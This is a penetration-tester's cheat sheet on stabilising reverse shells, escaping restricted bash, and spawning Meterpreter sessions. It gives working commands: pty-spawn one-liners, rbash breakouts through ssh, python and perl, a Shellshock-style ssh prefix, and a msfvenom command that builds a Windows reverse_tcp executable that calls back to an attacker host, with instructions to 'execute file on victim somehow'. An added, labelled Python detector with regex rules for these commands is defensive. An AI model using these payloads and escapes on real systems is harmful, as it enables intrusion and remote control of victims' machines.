Neko

Shell Stabilisation

How to fix your shells and escape rbash

Last updated: May 4th, 2023

Stabilising a Linux Shell

There are two general approaches to this. If the first doesn't work, try the second.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

## or

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm; export SHELL=/bin/bash
CTRL+Z
stty raw -echo;fg

Escaping rbash

  1. env
  2. echo $PATH
  3. echo $SHELL
  4. check what's allowed
    • if / is allowed what about /bin/sh?
    • if unix commands are allowed, try cp /bin/sh /dir/from/PATH; sh
    • can you use export?
  5. ssh
    • ssh user@x.x.x.x -t "/bin/bash"
    • ssh user@x.x.x.x -t "bash --noprofile"
    • ssh user@x.x.x.x -t "() {:;}; /bin/bash"
  6. file writing
    • echo "code" | tee script.sh
    • python -c 'import os; os.system("/bin/bash")'
    • perl -e 'exec "/bin/bash";'
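
The defender's view of the stabilisation and rbash-escape commands above, as an added example that is not part of the original page: a small matcher that flags these command lines in process-execution logs. The rule names, the one-command-line-per-entry log format and the sample lines are constructed assumptions.

```python
import re

# Heuristic rules built from the commands listed above; rule names are hypothetical.
RULES = [
    ("script_pty", re.compile(r"\bscript\s+(-\w+\s+)*/dev/null\b")),
    ("pty_spawn", re.compile(r"\bpython[23]?\s+-c\s+.*\bpty\.spawn\(")),
    ("shell_copied", re.compile(r"\bcp\s+/bin/(ba)?sh\s+\S+")),
    ("ssh_forced_shell", re.compile(r"\bssh\s+.*\s-t\s+[\"']?(/bin/)?(ba)?sh\b")),
    ("shellshock_prefix", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    ("interp_shell_exec", re.compile(
        r"\b(python[23]?\s+-c|perl\s+-e)\s+.*\b(os\.system|exec)\b.*/bin/(ba)?sh")),
]

# Constructed sample: one process command line per entry, as an execve audit
# log or EDR process event would record it. The last three lines are benign.
SAMPLE = r'''
SHELL=/bin/bash script -q /dev/null
python3 -c "import pty;pty.spawn('/bin/bash')"
cp /bin/sh /usr/local/rbin/sh
ssh user@192.0.2.10 -t "bash --noprofile"
ssh user@192.0.2.10 -t "() {:;}; /bin/bash"
python -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
ssh user@192.0.2.10 uptime
python3 manage.py runserver
cp /etc/hosts /tmp/hosts.bak
'''.strip().splitlines()


def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Map each flagged command line to the rules it matched."""
    hits = {}
    for line in lines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE).items():
        print(f"{','.join(rules):20} {line}")
```

These are string heuristics; pair them with process-ancestry and TTY-allocation telemetry before alerting.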

Spawning a Meterpreter Shell

  • using shell_to_meterpreter
    # in msfconsole
    use shell_to
    set session 1
  • creating an executable
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.180.131 LPORT=4444 -f exe -o shell.exe
    msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.180.131; set LPORT 4444; run"
    # execute file on victim somehow